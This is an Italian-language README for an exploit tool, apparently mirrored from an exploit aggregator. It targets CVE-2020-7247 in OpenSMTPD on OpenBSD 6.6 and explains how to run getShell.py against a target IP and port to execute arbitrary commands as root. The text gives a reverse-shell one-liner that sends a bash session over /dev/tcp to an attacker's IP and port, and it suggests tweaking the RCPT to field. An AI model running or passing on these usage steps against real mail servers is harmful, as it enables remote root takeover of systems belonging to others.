## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BYTESCRAPPERS-CVE-2020-7247
# CVE-2020-7247
Questa vulnerabilità esiste nella funzione “smtp_mailaddr()” del server di posta OpenSMTPD di OpenBSD, e interessa la versione 6.6 di OpenBSD. Ciò permette a un attaccante di eseguire comandi shell arbitrari come “sleep 66” come utente root.
### Come usare?
`python3 getShell.py <targetIp> <targetPort> <command>`
Se hai bisogno di una reverse shell, eseguilo così
`python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'`
## Importante
Modifica alcune cose in questo exploit come RCPT to e qualcos'altro (se necessario)
Vedi questo articolo per una spiegazione piĂą chiara
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/